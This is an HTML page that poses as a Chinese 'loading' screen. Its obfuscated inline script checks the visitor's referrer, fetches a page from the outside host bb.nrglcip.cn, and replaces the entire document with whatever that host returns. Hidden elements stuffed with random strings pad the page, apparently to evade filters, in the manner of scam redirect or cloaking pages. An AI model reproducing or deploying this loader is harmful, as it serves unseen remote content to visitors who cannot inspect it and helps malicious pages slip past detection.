<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .vo5Aj0 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .vo5Aj0 .jBzEWI {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .vo5Aj0 .content {
            line-height: 50px;
            text-align: center
        }

        .vo5Aj0 .img {
            width: 100%
        }

        .vo5Aj0 .NuySwp {
            text-align: center
        }

        .vo5Aj0 .NuySwp span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .vo5Aj0 .NuySwp span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .vo5Aj0 .NuySwp span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .vo5Aj0 .NuySwp span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .vo5Aj0 .NuySwp span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .vo5Aj0 .NuySwp span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .vo5Aj0 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function L3qCCbbfP0(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var ueK8M1N = L3qCCbbfP0('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ ueK8M1N +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ ueK8M1N +".html?a=share";
		}
		
        x4Rl2m=url+"#"+new Date().getTime();
        x4Rl2m && function() {
            $.get(x4Rl2m, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<img  src='' style='display:none'>
<div style='display:none'>xDYlUFbywljKNIZQySQyTqViDgxW0ZXlx1JBouWUWN5fsNAzLcQwacsiEeRbZ4MZXiYyJDOp5C1</div>
<b style='display:none' >UfWD6rOphnKWPw1auIWxjxwhY63wGhHcyy3ke5QTByqhGVxLmHZJplVsv0xpGMngfHDSeJoXR38mSwTwt</b>
<h1 style='display:none' >ZXhWBqDQA4hqt8VZccTDeVt4jxy2Yj1T9JPYAJjm7G</h1>
<b style='display:none' >UfWD6rOphnKWPw1auIWxjxwhY63wGhHcyy3ke5QTByqhGVxLmHZJplVsv0xpGMngfHDSeJoXR38mSwTwt</b><div class="vo5Aj0">
    <div class="jBzEWI">
        <div class="NuySwp">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<b style='display:none' >Zy7iIPq1xcEBfBWzFSBx84JI9u9WkrAU29VGtFB4FZoGXnw9mNTAqd2L4ez5zp5pDrvGPlyypksy2o0TgCv</b>
<img  src='' style='display:none'>
<img  src='' style='display:none'></body>
</html>